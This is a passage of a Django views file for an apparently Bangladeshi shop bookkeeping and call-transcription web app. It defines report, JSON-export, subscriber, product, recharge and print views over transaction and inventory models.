            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


@login_required(login_url='/login/')
def report_payment(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False

    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    sell_transaction_with_due = Transaction.objects.filter(seller_id=shop_object, total_due__lte=0)
    buy_transaction_with_due = Transaction.objects.filter(buyer_id=shop_object, total_due__lte=0)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    buyer_account = BuyerSellerAccount.objects.filter(seller=shop_object,  total_due__lte=0)
    seller_account = BuyerSellerAccount.objects.filter(buyer=shop_object,  total_due__lte=0)
    all_user_for_base = Consumer.objects.all()
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    transcriber_name = request.session['user']
    return render(request, 'pages/report_payment.html', {'shop_list_base': all_shop_for_base,
                                                         'sell_transaction_with_due': sell_transaction_with_due,
                                                         'buy_transaction_with_due': buy_transaction_with_due,
                                                         'all_consumer_for_base' :all_consumer_for_base,
                                                         'buyer_account': buyer_account,
                                                         'transcriber_name': transcriber_name,
                                                         'seller_account': seller_account,
                                                         'shop_name': shop_name,
                                                         'bangla': bangla,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_due(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    sell_transaction_with_due = Transaction.objects.filter(seller_id=shop_object, total_due__gt=0)
    buy_transaction_with_due = Transaction.objects.filter(buyer_id=shop_object, total_due__gt=0)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    buyer_account = SMSPayment.objects.filter(seller=shop_object)
    seller_account = SMSPayment.objects.filter(buyer=shop_object)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_due.html', {'shop_list_base': all_shop_for_base,
                                                     'sell_transaction_with_due': sell_transaction_with_due,
                                                     'buy_transaction_with_due': buy_transaction_with_due,
                                                     'buyer_account': buyer_account,
                                                     'all_consumer_for_base' :all_consumer_for_base,
                                                     'bangla': bangla,
                                                     'seller_account': seller_account,
                                                     'transcriber_name': transcriber_name,
                                                     'shop_name': shop_name,
                                                     'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_profit(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_profit.html', {'shop_list_base': all_shop_for_base,
                                                        'shop_name': shop_name,
                                                        'shop_id': shop_id,
                                                        'all_consumer_for_base' :all_consumer_for_base,
                                                        'bangla': bangla,
                                                        'transcriber_name': transcriber_name,
                                                        'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_profit_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)
    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    output = '{"data": [ '

    if get_data['t'] == '1':
        this_year = datetime.date.today().year
        this_month = 1
        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while this_month < 13:
            day_string = True
            for a_product in Product.objects.all():
                count = 0
                product_profit = 0
                product_name = a_product.name
                for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                                            DateAdded__year=this_year,
                                                                                            DateAdded__month=this_month):
                    # start counting for this product
                    if this_day_transaction.product == a_product:
                        product_profit += this_day_transaction.profit
                        count += 1

                if count > 0:
                    if day_string:
                        if this_month == 1:
                            output += '["January","",""], '
                        elif this_month == 2:
                            output += '["February","",""], '
                        elif this_month == 3:
                            output += '["March","",""], '
                        elif this_month == 4:
                            output += '["April","",""], '
                        elif this_month == 5:
                            output += '["May","",""], '
                        elif this_month == 6:
                            output += '["June","",""], '
                        elif this_month == 7:
                            output += '["July","",""], '
                        elif this_month == 8:
                            output += '["August","",""], '
                        elif this_month == 9:
                            output += '["September","",""], '
                        elif this_month == 10:
                            output += '["October","",""], '
                        elif this_month == 11:
                            output += '["November","",""], '
                        elif this_month == 12:
                            output += '["December","",""], '
                        day_string = False
                    output += '["","%s","%s"] ,' % (product_name, product_profit)
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
            this_month += 1
    if get_data['t'] == '2':
        this_year = datetime.date.today().year
        this_month = 1

        while this_month < 13:
            day = 1
            while day < 32:
                day_string = True
                for a_product in Product.objects.all():
                    count = 0
                    product_profit = 0
                    product_name = a_product.name
                    for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                                                DateAdded__year=this_year,
                                                                                                DateAdded__month=this_month,
                                                                                                DateAdded__day=day):
                        # start counting for this product
                        if this_day_transaction.product == a_product:
                            product_profit += this_day_transaction.profit
                            count += 1

                    if count > 0:
                        if day_string:
                            output += '["%s/%s/%s","",""] ,' % (day, this_month, this_year)
                            day_string = False
                        output += '["","%s","%s"] ,' % (product_name, product_profit)
                day += 1
            this_month += 1
    if get_data['t'] == '3':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                                        DateAdded__year=this_year,
                                                                                        DateAdded__month=this_month):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
    if get_data['t'] == '4':
        this_year = datetime.date.today().year
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                                        DateAdded__year=this_year):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
    if get_data['t'] == '5':
        this_year = datetime.date.today().year
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")





@login_required(login_url='/login/')
def report_product(request):

    get_data = request.GET
    shop_name = get_data['shop']
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    shop_inventory = Inventory.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    selected_products = ProductsInTransaction.objects.filter(TID=Transaction.objects.filter(seller=shop_object))

    selected_products_buy = ProductsInTransaction.objects.filter(TID=Transaction.objects.filter(buyer=shop_object))
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_product.html', {'shop_list_base': all_shop_for_base,
                                                         'shop_inventory': shop_inventory,
                                                         'shop_name': shop_name,
                                                         'shop_id': shop_id,
                                                         'bangla': bangla,
                                                         'all_consumer_for_base' :all_consumer_for_base,
                                                         'transcriber_name': transcriber_name,
                                                         'selected_products_buy': selected_products_buy,
                                                         'selected_products': selected_products,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_product_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)
    shop_inventory = Inventory.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    output = '{"data": [ '

    if get_data['t'] == '1':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 32:
            day_string = True
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name
                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            # if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            #     if a_product.bulk_to_retail_unit == 0:
                            #         count = count + product_in_this_transaction.quantity
                            #         product_price = product_price + product_in_this_transaction.price_per_unit
                            #     else:
                            #         count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                            #         product_price = product_price + product_in_this_transaction.price_per_unit
                            # else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit * product_in_this_transaction.quantity

                if count > 0:
                    if day_string:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (product_name, count,
                                                              a_product.retail_unit,
                                                              float(product_price / count))
            day += 1
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
    if get_data['t'] == '2':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1
        while day < 32:
            day_string = True
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name
                for this_day_transaction in Transaction.objects.filter(buyer=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (product_name, count,
                                                              a_product.bulk_wholesale_unit,
                                                              float(product_price / count))
            day += 1
    if get_data['t'] == '3':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year, DateAdded__month=this_month):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (product_name, count,
                                                       a_product.retail_unit,
                                                       float(product_price / count))
    if get_data['t'] == '4':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(buyer=shop_object, DateAdded__year=this_year, DateAdded__month=this_month):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (product_name, count,
                                                       a_product.retail_unit,
                                                       float(product_price / count))
    output = output[:-1]
    output += ']}'
    selected_products_buy = ProductsInTransaction.objects.filter(TID=Transaction.objects.filter(buyer=shop_object))
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    return HttpResponse(output, content_type="text/plain")



# paste the template name of the report_analytical instead of report_product here
@login_required(login_url='/login/')
def report_analytical(request):
    all_product = Product.objects.all()
    final_output = ''
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    for product in all_product:
        print(product.name)
        if ProductsInTransaction.objects.filter(product=product).exists():
            product_output = "[%s, " % product.name
            sold_amount = 0
            for product_details in ProductsInTransaction.objects.filter(product=product):
                sold_amount = sold_amount + product_details.quantity
            product_output += str(sold_amount)
            final_output += product_output
        final_output += "] ,"
    print(final_output)
    final_output = final_output[:-1]
    print(final_output)
    add_notification = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/reports_analytical.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'shop_list_base': all_shop_for_base, 'product_sell': final_output,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'shop_name': shop_name,
                   'shop_id': shop_id,
                   'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_analytical_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)
    if get_data['t'] == '1':
        all_product = Product.objects.all()
        final_output = '{"cols": [ { "id": "", "label": "Topping", "pattern": "", "type": "string" }, ' \
                       '{ "id": "", "label": "Units", "pattern": "", "type": "number" } ], "rows": [ '
        for product in all_product:
            print(product.name)
            if ProductsInTransaction.objects.filter(product=product).exists():
                product_name = product.name
                sold_amount = 0
                for transaction_id in Transaction.objects.filter(seller=shop_object):
                    for product_details in ProductsInTransaction.objects.filter(product=product, TID=transaction_id):
                        sold_amount = sold_amount + product_details.quantity
                final_output += '{"c": [{"v": "%s","f": null},{"v": %s,"f": null}]},' % (product_name,
                                                                                         sold_amount)
        final_output = final_output[:-1]
        print(final_output)
    if get_data['t'] == '2':
        all_product = BuySellProfitInventory.objects.filter(shop=shop_object)
        final_output = '{"cols": [ { "id": "", "label": "Topping", "pattern": "", "type": "string" }, ' \
                       '{ "id": "", "label": "Profit", "pattern": "", "type": "number" } ], "rows": [ '
        for product in all_product:
            final_output += '{"c": [{"v": "%s","f": null},{"v": %s,"f": null}]},' % (product.product,
                                                                                     product.profit)
        final_output = final_output[:-1]
        print(final_output)
    final_output += ']}'
    print(final_output)
    return HttpResponse(final_output, content_type="text/plain")


# till this views created based on the list from mail
@login_required(login_url='/login/')
def report_recharge(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_recharge.html', {'shop_list_base': all_shop_for_base,
                                                          'all_consumer_for_base' :all_consumer_for_base,
                                                          'transcriber_name': transcriber_name,
                                                          'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_callduration(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_callduration_graph.html', {'shop_list_base': all_shop_for_base,
                                                                    'all_consumer_for_base' :all_consumer_for_base,
                                                                    'transcriber_name': transcriber_name,
                                                                    'all_user_for_base': all_user_for_base})

# not necessary
@login_required(login_url='/login/')
def report_transaction(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_transaction.html', {'shop_list_base': all_shop_for_base,
                                                             'all_consumer_for_base' :all_consumer_for_base,
                                                             'transcriber_name': transcriber_name,
                                                             'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_calltranscription(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_transcription.html', {'shop_list_base': all_shop_for_base,
                                                               'all_consumer_for_base' :all_consumer_for_base,
                                                               'transcriber_name': transcriber_name,
                                                               'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_usercall(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_user_call_recharge.html', {'shop_list_base': all_shop_for_base,
                                                                    'transcriber_name': transcriber_name,
                                                                    'all_consumer_for_base' :all_consumer_for_base,
                                                                    'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def transcription_page(request):
    print(request.POST)
    number_of_pending_calls = VoiceRecord.objects.filter(transcribed=False).count()
    number_of_pending_reg_calls = VoiceReg.objects.filter(completed=False).count()

    type_of_subscriber = ConsumerType.objects.all()
    number_of_fail_calls = VoiceRecord.objects.filter(with_error=True).count()
    number_of_completed_calls = VoiceRecord.objects.filter(with_error=False, transcribed=True).count()
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    return render(request, 'pages/transcription.html',
                  dict(pending_calls=number_of_pending_calls, types=type_of_subscriber,
                       pending_calls_reg=number_of_pending_reg_calls, number_of_fail_calls=str(number_of_fail_calls),
                       number_of_completed_calls=number_of_completed_calls, transcriber_name=transcriber_name,
                       shop_list_base=all_shop_for_base,all_consumer_for_base=all_consumer_for_base,
                       all_user_for_base=all_user_for_base))


# report views ends here


@login_required(login_url='/login/')
def add_subscriber_page(request):
    all_subscriber = Consumer.objects.all()
    type_of_subscriber = ConsumerType.objects.all()
    add_notification = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
    notification = ''
    if 'delete' in request.GET:
        get_data = request.GET
        add_notification = True
        delID = get_data['delete']
        if Consumer.objects.filter(id=delID).exists():
            item_for_delete = Consumer.objects.get(id=delID)
            notification = 'Daily statement for the user : ' + item_for_delete.name + ' is sent successfully.'
            # item_for_delete.delete()
            sales_statement = ''
            purchase_statement = ''
            today_date = datetime.date.today()
            today_day = today_date.day
            today_month = today_date.month
            today_year = today_date.year
            # for selling
            sell_transactions = Transaction.objects.filter(seller=item_for_delete, DateAdded__day=today_day,
                                                           DateAdded__month=today_month, DateAdded__year=today_year)
            total_sales = 0
            total_due = 0
            total_paid = 0
            for sell_transaction in sell_transactions:
                total_sales += sell_transaction.total_amount
                total_paid += sell_transaction.total_paid
                total_due += sell_transaction.total_due
            if total_sales > 0:
                sales_statement = ' bikroy korechen mot: ' + str(total_sales) + ' takar. nogod peyechen : ' + \
                                  str(total_paid) + ' taka ebong baki royeche ' + str(total_due) + ' taka.'
            buy_transactions = Transaction.objects.filter(buyer=item_for_delete, DateAdded__day=today_day,
                                                          DateAdded__month=today_month, DateAdded__year=today_year)
            total_purchase = 0
            total_due = 0
            total_paid = 0
            for buy_transaction in buy_transactions:
                total_purchase += buy_transaction.total_amount
                total_paid += buy_transaction.total_paid
                total_due += buy_transaction.total_due
            if total_purchase > 0:
                purchase_statement = ' kinechen mot: ' + str(total_purchase) + ' takar. Nogod diyechen : ' + \
                                     str(total_paid) + ' taka ebong baki royeche ' + str(total_due) + ' taka.'
            final_text = 'Aj apni' + sales_statement + purchase_statement + ' Dhonnobad'

            if total_purchase > 0 or total_sales > 0:
                print(final_text)
                send_sms(final_text, item_for_delete.phone)

        else:
            notification = 'Item not found'

    return render(request, 'pages/add_subscriber.html',
                  {'subscribers': all_subscriber, 'types': type_of_subscriber, 'add_notification': add_notification,
                   'shop_list_base': all_shop_for_base,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'notification':notification,
                   'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def add_product_page(request):
    all_product = Product.objects.all()
    add_notification = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
    notification = ''
    if 'delete' in request.GET:
        get_data = request.GET
        add_notification = True
        delID = get_data['delete']
        if Product.objects.filter(id=delID).exists():
            item_for_delete = Product.objects.get(id=delID)
            notification = 'The product : ' + item_for_delete.name + ' is deleted successfully.'
            item_for_delete.delete()
        else:
            notification = 'Item not found'

    return render(request, 'pages/add_product.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'transcriber_name': transcriber_name,'notification': notification,
                   'shop_list_base': all_shop_for_base, 'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_transcriber_performance(request):
    all_product = Product.objects.all()
    add_notification = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_transcriber_performance.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'transcriber_name': transcriber_name,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'shop_list_base': all_shop_for_base, 'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_transcriber_performance_json(request):
    final_output = '{"data": [ '
    for transcriber in Transcriber.objects.all():
        number_of_transcriptions = TranscriberInTranscription.objects.filter(name=transcriber).count()
        total_time_taken = 0
        total_product_trancribed = 0
        for transcriber_in_transaction in TranscriberInTranscription.objects.filter(name=transcriber):
            total_time_taken += float(transcriber_in_transaction.time_taken)
            total_product_trancribed += transcriber_in_transaction.number_of_products
        if number_of_transcriptions > 0:
            avg_time = total_time_taken / number_of_transcriptions
            avg_product = total_product_trancribed / number_of_transcriptions
            final_output += '["%s","%s","%s","%s","%s"] ,' % (transcriber.id, transcriber.name,
                                                              number_of_transcriptions, avg_time, avg_product)
    final_output = final_output[:-1]
    final_output += ']}'
    return HttpResponse(final_output, content_type="text/plain")


@login_required(login_url='/login/')
def user_balance_recharge(request):
    post_data = request.POST
    notification = ''
    for all_consumers in Consumer.objects.all():
        if Recharge.objects.filter(user=all_consumers).exists():
            print('Already_Added')
        else:
            new_added = Recharge(user=all_consumers)
            new_added.save()

        if TotalRecharge.objects.filter(user=all_consumers).exists():
            print('Already_Added')
        else:
            new_added = TotalRecharge(user=all_consumers)
            new_added.save()
    add_notification = False
    if 'user' in post_data and 'recharge_amount' in post_data:
        user_name = post_data['user']
        user_object = Consumer.objects.get(name=user_name)
        if is_number(post_data['recharge_amount']) or is_float(post_data['recharge_amount']):
            new_recharge_added = Recharge(user=user_object, amount=float(post_data['recharge_amount']))
            new_recharge_added.save()
            new_recharge_update = TotalRecharge.objects.get(user=user_object)
            new_recharge_update.amount += float(post_data['recharge_amount'])
            new_recharge_update.save()
            add_notification = True
            notification = 'Amount %s has been added to the number %s' %(post_data['recharge_amount'],
                                                                         user_object.phone)
        else:
            notification = 'Something went wrong. Please try again.'
    recharge_all = TotalRecharge.objects.all()
    today_date = datetime.date.today()
    today_day = today_date.day
    today_month = today_date.month
    today_year = today_date.year
    recharge_today = Recharge.objects.filter(DateAdded__day=today_day,
                                             DateAdded__month=today_month, DateAdded__year=today_year, amount__gt=0)
    all_product = Product.objects.all()
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_user_call_recharge.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'shop_list_base': all_shop_for_base, 'recharge_all': recharge_all,
                   'transcriber_name': transcriber_name,
                   'recharge_today': recharge_today, 'all_user_for_base': all_user_for_base,
                   'notification': notification})
# views for printing


@login_required(login_url='/login/')
def report_monthly_shop_print(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False

    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    total_sell = 0
    total_sell_due = 0
    total_sell_paid = 0
    total_purchase = 0
    total_purchase_due = 0
    total_purchase_paid = 0
    for month_sell in BuyerSellerAccount.objects.filter(seller=shop_object):
        total_sell += month_sell.total_amount_of_transaction
        total_sell_due += month_sell.total_due
        total_sell_paid += month_sell.total_paid
    for month_purchase in BuyerSellerAccount.objects.filter(buyer=shop_object):
        total_purchase += month_purchase.total_amount_of_transaction
        total_purchase_due += month_purchase.total_due
        total_purchase_paid += month_purchase.total_paid
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    transcriber_name = request.session['user']
    return render(request, 'print/report_monthly_shop.html', {'shop_list_base': all_shop_for_base,
                                                              'shop_name': shop_name,
                                                              'all_consumer_for_base' :all_consumer_for_base,
                                                              'total_sell': total_sell,
                                                              'transcriber_name': transcriber_name,
                                                              'total_sell_due': total_sell_due,
                                                              'total_sell_paid': total_sell_paid,
                                                              'bangla': bangla,
                                                              'total_purchase': total_purchase,
                                                              'total_purchase_due': total_purchase_due,
                                                              'total_purchase_paid': total_purchase_paid,
                                                              'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_due_print(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    sell_transaction_with_due = Transaction.objects.filter(seller_id=shop_object, total_due__gt=0)
    buy_transaction_with_due = Transaction.objects.filter(buyer_id=shop_object, total_due__gt=0)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    buyer_account = BuyerSellerAccount.objects.filter(seller=shop_object,  total_due__gt=0)
    seller_account = BuyerSellerAccount.objects.filter(buyer=shop_object,  total_due__gt=0)
